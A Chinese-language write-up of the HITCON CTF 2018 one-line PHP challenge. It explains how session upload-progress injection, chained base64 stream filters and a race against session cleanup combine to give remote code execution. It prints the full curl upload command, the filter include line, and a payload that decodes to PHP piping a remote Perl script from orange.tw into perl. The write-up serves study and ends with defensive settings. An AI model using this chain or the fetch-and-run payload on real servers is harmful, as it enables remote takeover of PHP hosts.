HITCON CTF 2018 - 单行PHP挑战:会话上传与流过滤器链的极致利用

HITCON CTF 2018 - 单行PHP挑战

这是Orange带来的技术分享 :)

挑战背景

在每年HITCON CTF中,我都会设计至少一个PHP漏洞利用挑战,其特点是源码极其简洁(通常只有几行),但利用难度极高。本次挑战是历年最短的一个------仅含单行PHP代码,运行在默认安装的Ubuntu 18.04 + PHP7.2 + Apache环境。

核心技术点

  1. 会话上传进度控制

    利用session.upload_progress特性(默认启用)向SESSION文件注入可控内容:

    bash 复制代码
    curl http://target/ -H 'Cookie: PHPSESSID=iamorange' \
      -F 'PHP_SESSION_UPLOAD_PROGRESS=payload' -F 'file=@/etc/passwd'
  2. 流过滤器链绕过

    通过多级base64解码过滤器处理前缀污染:

    php 复制代码
    php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange
  3. 竞态条件利用

    对抗session.upload_progress.cleanup的自动清理机制(默认开启),通过快速竞争或大文件上传维持会话。

漏洞利用过程

  1. 构造特殊base64载荷,经过三级解码后生成有效PHP代码:

    php 复制代码
    原始:VVVSM0wyTkhhSGRKUjBKcVpGaEtjMGxIT1hsWlZ6VnVXbE0xTUdSNU9UTk1Na3BxVEc1Q2MyWklRbXhqYlhkblRGZEJOMUI2TkhaTWVUaDJUSGs0ZGt4NU9IWk1lVGgy
    解码后:@<?php `curl orange.tw/w/bc.pl|perl -`;?>/////////////
  2. 结合会话文件包含漏洞实现RCE:

    php 复制代码
    include('php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange');

防御建议

  • 禁用session.upload_progress功能
  • 设置open_basedir限制文件访问范围
  • 对会话文件路径进行随机化处理
相关推荐
Joseit1 小时前
AI应用生成平台:数据库、缓存与存储
数据库·人工智能·缓存
QYR_111 小时前
2025-2031年全球箱体与盒体搬运机器人行业全景报告(含市场规模、竞争格局及投资潜力)
人工智能·市场研究
袁总6663 小时前
智能座舱问答
人工智能
Sirius Wu4 小时前
SFT/DPO/PPO/GRPO训练全解析
人工智能·深度学习·语言模型
Learn Beyond Limits4 小时前
Clustering|聚类
人工智能·深度学习·神经网络·机器学习·ai·聚类·吴恩达
KKKlucifer4 小时前
IDC发布AI+政务、财政、应急三大市场空间与厂商份额报告
人工智能·百度·政务
丁希希哇4 小时前
【论文精读】CogVideoX: Text-to-Video Diffusion Models with An Expert Transformer
人工智能·深度学习·transformer
网易伏羲4 小时前
网易伏羲受邀亮相2025云栖大会,展示AI领域前沿创新成果
人工智能
都是些老物件4 小时前
TensorFlow中的掩码传递
人工智能·python·tensorflow
小苑同学5 小时前
安全对齐到底是什么
人工智能·安全